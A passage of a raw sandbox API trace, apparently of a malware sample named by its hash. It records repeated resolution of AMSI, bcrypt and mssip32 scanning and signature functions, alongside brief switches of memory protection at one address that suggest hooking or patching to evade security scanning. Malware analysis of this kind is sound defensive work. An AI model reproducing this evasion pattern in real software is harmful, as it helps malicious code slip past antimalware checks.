[0094.959] SetErrorMode (uMode=0x8000) returned 0x0 [0094.959] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0094.963] SetErrorMode (uMode=0x0) returned 0x8000 [0094.964] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0094.964] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0094.964] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0095.244] GetCurrentProcess () returned 0xffffffff [0095.244] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0095.244] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0095.245] FreeLibrary (hLibModule=0x6f870000) returned 1 [0095.247] SetErrorMode (uMode=0x8000) returned 0x0 [0095.247] LoadLibraryA (lpLibFileName="bcrypt") returned 0x71560000 [0095.247] SetErrorMode (uMode=0x0) returned 0x8000 [0095.247] GetModuleHandleA (lpModuleName="bcrypt") returned 0x71560000 [0095.248] GetProcAddress (hModule=0x71560000, lpProcName="BCryptVerifySignature") returned 0x71567540 [0095.248] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0095.331] GetCurrentProcess () returned 0xffffffff [0095.331] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0095.331] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0095.332] FreeLibrary (hLibModule=0x71560000) returned 1 [0095.332] SetErrorMode (uMode=0x8000) returned 0x0 [0095.332] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0095.335] SetErrorMode (uMode=0x0) returned 0x8000 [0095.336] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0095.336] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiUacScan") returned 0x6f874360 [0095.336] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0095.370] GetCurrentProcess () returned 0xffffffff [0095.370] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0095.370] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0095.370] FreeLibrary (hLibModule=0x6f870000) returned 1 [0095.401] SetErrorMode (uMode=0x8000) returned 0x0 [0095.401] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0095.405] SetErrorMode (uMode=0x0) returned 0x8000 [0095.405] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0095.405] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0095.405] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0095.441] GetCurrentProcess () returned 0xffffffff [0095.441] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0095.441] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0095.441] FreeLibrary (hLibModule=0x6f870000) returned 1 [0095.442] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x19fb3c, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe")) returned 0x62 [0095.442] CreateFileA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x26c [0095.443] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf6800 [0095.443] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x3d70000 [0095.443] VirtualAlloc (lpAddress=0x3d70000, dwSize=0xf8000, flAllocationType=0x1000, flProtect=0x4) returned 0x3d70000 [0095.446] ReadFile (in: hFile=0x26c, lpBuffer=0x3d7000c, nNumberOfBytesToRead=0xf6800, lpNumberOfBytesRead=0x19fc24, lpOverlapped=0x0 | out: lpBuffer=0x3d7000c*, lpNumberOfBytesRead=0x19fc24*=0xf6800, lpOverlapped=0x0) returned 1 [0095.469] CloseHandle (hObject=0x26c) returned 1 [0095.469] SetErrorMode (uMode=0x8000) returned 0x0 [0095.469] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0095.473] SetErrorMode (uMode=0x0) returned 0x8000 [0095.473] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0095.473] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0095.473] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0095.526] GetCurrentProcess () returned 0xffffffff [0095.526] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0095.526] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0095.526] FreeLibrary (hLibModule=0x6f870000) returned 1 [0095.528] SetErrorMode (uMode=0x8000) returned 0x0 [0095.529] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0095.533] SetErrorMode (uMode=0x0) returned 0x8000 [0095.533] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0095.533] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0095.533] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0095.581] GetCurrentProcess () returned 0xffffffff [0095.581] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0095.581] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0095.581] FreeLibrary (hLibModule=0x6f870000) returned 1 [0095.582] SetErrorMode (uMode=0x8000) returned 0x0 [0095.582] LoadLibraryA (lpLibFileName="bcrypt") returned 0x71560000 [0095.583] SetErrorMode (uMode=0x0) returned 0x8000 [0095.583] GetModuleHandleA (lpModuleName="bcrypt") returned 0x71560000 [0095.583] GetProcAddress (hModule=0x71560000, lpProcName="BCryptVerifySignature") returned 0x71567540 [0095.583] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0095.622] GetCurrentProcess () returned 0xffffffff [0095.622] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0095.622] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0095.622] FreeLibrary (hLibModule=0x71560000) returned 1 [0095.622] SetErrorMode (uMode=0x8000) returned 0x0 [0095.622] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0095.625] SetErrorMode (uMode=0x0) returned 0x8000 [0095.626] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0095.626] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0095.626] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0095.683] GetCurrentProcess () returned 0xffffffff [0095.683] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0095.683] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0095.683] FreeLibrary (hLibModule=0x6f870000) returned 1 [0095.689] SetErrorMode (uMode=0x8000) returned 0x0 [0095.689] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0095.695] SetErrorMode (uMode=0x0) returned 0x8000 [0095.695] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0095.695] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0095.695] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0095.754] GetCurrentProcess () returned 0xffffffff [0095.754] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0095.754] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0095.755] FreeLibrary (hLibModule=0x6f870000) returned 1 [0095.759] VirtualAlloc (lpAddress=0x2220000, dwSize=0xa0000, flAllocationType=0x1000, flProtect=0x4) returned 0x2220000 [0095.788] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x3e70000 [0095.789] VirtualAlloc (lpAddress=0x3e70000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e70000 [0095.790] VirtualAlloc (lpAddress=0x3e68000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e68000 [0095.797] VirtualAlloc (lpAddress=0x3ec0000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x3ec0000 [0095.799] VirtualAlloc (lpAddress=0x3ee8000, dwSize=0x34000, flAllocationType=0x1000, flProtect=0x4) returned 0x3ee8000 [0095.801] VirtualFree (lpAddress=0x3e70000, dwSize=0x4c000, dwFreeType=0x4000) returned 1 [0095.812] VirtualFree (lpAddress=0x3e68000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0095.820] VirtualAlloc (lpAddress=0x3e70000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e70000 [0095.821] VirtualAlloc (lpAddress=0x3e68000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e68000 [0095.821] VirtualFree (lpAddress=0x3f18000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0095.823] VirtualAlloc (lpAddress=0x3f18000, dwSize=0x1c000, flAllocationType=0x1000, flProtect=0x4) returned 0x3f18000 [0095.823] VirtualFree (lpAddress=0x3e80000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0095.827] VirtualFree (lpAddress=0x3ee8000, dwSize=0x2c000, dwFreeType=0x4000) returned 1 [0095.829] SetErrorMode (uMode=0x8000) returned 0x0 [0095.829] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0095.833] SetErrorMode (uMode=0x0) returned 0x8000 [0095.833] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0095.833] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0095.833] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0095.927] GetCurrentProcess () returned 0xffffffff [0095.927] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0095.927] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0095.927] FreeLibrary (hLibModule=0x6f870000) returned 1 [0095.928] VirtualFree (lpAddress=0x3f30000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0095.929] SetErrorMode (uMode=0x8000) returned 0x0 [0095.930] LoadLibraryA (lpLibFileName="mssip32") returned 0x6f870000 [0097.320] SetErrorMode (uMode=0x0) returned 0x8000 [0097.321] GetModuleHandleA (lpModuleName="mssip32") returned 0x6f870000 [0097.321] GetProcAddress (hModule=0x6f870000, lpProcName="CryptSIPCreateIndirectData") returned 0x6f871380 [0097.321] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0097.392] GetCurrentProcess () returned 0xffffffff [0097.392] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0097.392] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0097.392] FreeLibrary (hLibModule=0x6f870000) returned 1 [0097.398] SetErrorMode (uMode=0x8000) returned 0x0 [0097.398] LoadLibraryA (lpLibFileName="mssip32") returned 0x6f870000 [0097.412] SetErrorMode (uMode=0x0) returned 0x8000 [0097.412] GetModuleHandleA (lpModuleName="mssip32") returned 0x6f870000 [0097.413] GetProcAddress (hModule=0x6f870000, lpProcName="CryptSIPGetInfo") returned 0x6f8713a0 [0097.413] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0097.463] GetCurrentProcess () returned 0xffffffff [0097.463] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0097.463] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0097.464] FreeLibrary (hLibModule=0x6f870000) returned 1 [0097.520] SetErrorMode (uMode=0x8000) returned 0x0 [0097.520] LoadLibraryA (lpLibFileName="mssip32") returned 0x6f870000 [0097.548] SetErrorMode (uMode=0x0) returned 0x8000 [0097.549] GetModuleHandleA (lpModuleName="mssip32") returned 0x6f870000 [0097.549] GetProcAddress (hModule=0x6f870000, lpProcName="CryptSIPPutSignedDataMsg") returned 0x6f871350 [0097.549] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0097.667] GetCurrentProcess () returned 0xffffffff [0097.667] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0097.667] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0097.667] FreeLibrary (hLibModule=0x6f870000) returned 1 [0097.709] SetErrorMode (uMode=0x8000) returned 0x0 [0097.709] LoadLibraryA (lpLibFileName="mssip32") returned 0x6f870000 [0097.743] SetErrorMode (uMode=0x0) returned 0x8000 [0097.744] GetModuleHandleA (lpModuleName="mssip32") returned 0x6f870000 [0097.854] GetProcAddress (hModule=0x6f870000, lpProcName="CryptSIPVerifyIndirectData") returned 0x6f871370 [0097.854] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0097.912] GetCurrentProcess () returned 0xffffffff [0097.912] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0097.912] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0097.912] FreeLibrary (hLibModule=0x6f870000) returned 1 [0097.922] SetErrorMode (uMode=0x8000) returned 0x0 [0097.922] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0097.926] SetErrorMode (uMode=0x0) returned 0x8000 [0097.926] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0097.926] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0097.926] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0097.973] GetCurrentProcess () returned 0xffffffff [0097.973] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0097.973] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0097.973] FreeLibrary (hLibModule=0x6f870000) returned 1 [0097.975] SetErrorMode (uMode=0x8000) returned 0x0 [0097.975] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0097.982] SetErrorMode (uMode=0x0) returned 0x8000 [0097.982] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0097.982] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiUacInitialize") returned 0x6f874140 [0097.982] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0098.028] GetCurrentProcess () returned 0xffffffff [0098.028] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0098.028] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0098.028] FreeLibrary (hLibModule=0x6f870000) returned 1 [0098.029] SetErrorMode (uMode=0x8000) returned 0x0 [0098.030] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0098.034] SetErrorMode (uMode=0x0) returned 0x8000 [0098.034] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0098.034] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0098.034] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0098.136] GetCurrentProcess () returned 0xffffffff [0098.136] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0098.136] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0098.136] FreeLibrary (hLibModule=0x6f870000) returned 1 [0098.137] SetErrorMode (uMode=0x8000) returned 0x0 [0098.137] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0098.141] SetErrorMode (uMode=0x0) returned 0x8000 [0098.141] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0098.141] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0098.141] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0098.173] GetCurrentProcess () returned 0xffffffff [0098.173] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0098.173] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0098.173] FreeLibrary (hLibModule=0x6f870000) returned 1 [0098.201] SetErrorMode (uMode=0x8000) returned 0x0 [0098.201] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0098.206] SetErrorMode (uMode=0x0) returned 0x8000 [0098.206] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0098.206] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0098.206] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0098.259] GetCurrentProcess () returned 0xffffffff [0098.259] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0098.259] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0098.259] FreeLibrary (hLibModule=0x6f870000) returned 1 [0098.260] SetErrorMode (uMode=0x8000) returned 0x0 [0098.260] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0098.263] SetErrorMode (uMode=0x0) returned 0x8000 [0098.263] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0098.264] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0098.264] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0098.343] GetCurrentProcess () returned 0xffffffff [0098.343] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0098.343] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0098.343] FreeLibrary (hLibModule=0x6f870000) returned 1 [0098.349] VirtualAlloc (lpAddress=0x3ee8000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x3ee8000 [0098.354] VirtualAlloc (lpAddress=0x3eec000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x3eec000 [0098.359] VirtualAlloc (lpAddress=0x3ef0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x3ef0000 [0098.364] VirtualAlloc (lpAddress=0x3ef4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x3ef4000 [0098.370] VirtualAlloc (lpAddress=0x3ef8000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x3ef8000 [0098.375] VirtualAlloc (lpAddress=0x3efc000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x3efc000 [0098.376] SetErrorMode (uMode=0x8000) returned 0x0 [0098.376] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0098.417] SetErrorMode (uMode=0x0) returned 0x8000 [0098.417] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0098.417] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0098.417] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0098.455] GetCurrentProcess () returned 0xffffffff [0098.455] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0098.455] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0098.455] FreeLibrary (hLibModule=0x6f870000) returned 1 [0098.464] SetErrorMode (uMode=0x8000) returned 0x0 [0098.464] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0098.467] SetErrorMode (uMode=0x0) returned 0x8000 [0098.467] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0098.468] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0098.468] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0098.510] GetCurrentProcess () returned 0xffffffff [0098.510] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0098.510] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0098.511] FreeLibrary (hLibModule=0x6f870000) returned 1 [0098.512] SetErrorMode (uMode=0x8000) returned 0x0 [0098.512] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0098.516] SetErrorMode (uMode=0x0) returned 0x8000 [0098.516] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0098.516] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0098.516] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0098.601] GetCurrentProcess () returned 0xffffffff [0098.602] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0098.602] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0098.602] FreeLibrary (hLibModule=0x6f870000) returned 1 [0098.603] SetErrorMode (uMode=0x8000) returned 0x0 [0098.603] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0098.606] SetErrorMode (uMode=0x0) returned 0x8000 [0098.606] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0098.606] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0098.607] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0098.607] GetCurrentProcess () returned 0xffffffff [0098.607] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0098.607] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0098.607] FreeLibrary (hLibModule=0x6f870000) returned 1 [0098.608] SetErrorMode (uMode=0x8000) returned 0x0 [0098.608] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0098.612] SetErrorMode (uMode=0x0) returned 0x8000 [0098.612] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0098.612] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0098.613] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0098.658] GetCurrentProcess () returned 0xffffffff [0098.658] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0098.658] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x40) returned 1 [0098.658] FreeLibrary (hLibModule=0x6f870000) returned 1 [0098.660] VirtualAlloc (lpAddress=0x0, dwSize=0x1d000, flAllocationType=0x2000, flProtect=0x1) returned 0x2330000 [0098.660] SetErrorMode (uMode=0x8000) returned 0x0 [0098.660] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0098.663] SetErrorMode (uMode=0x0) returned 0x8000 [0098.663] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0098.664] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0098.664] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19f920 | out: lpflOldProtect=0x19f920*=0x4) returned 1 [0098.730] GetCurrentProcess () returned 0xffffffff [0098.730] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) 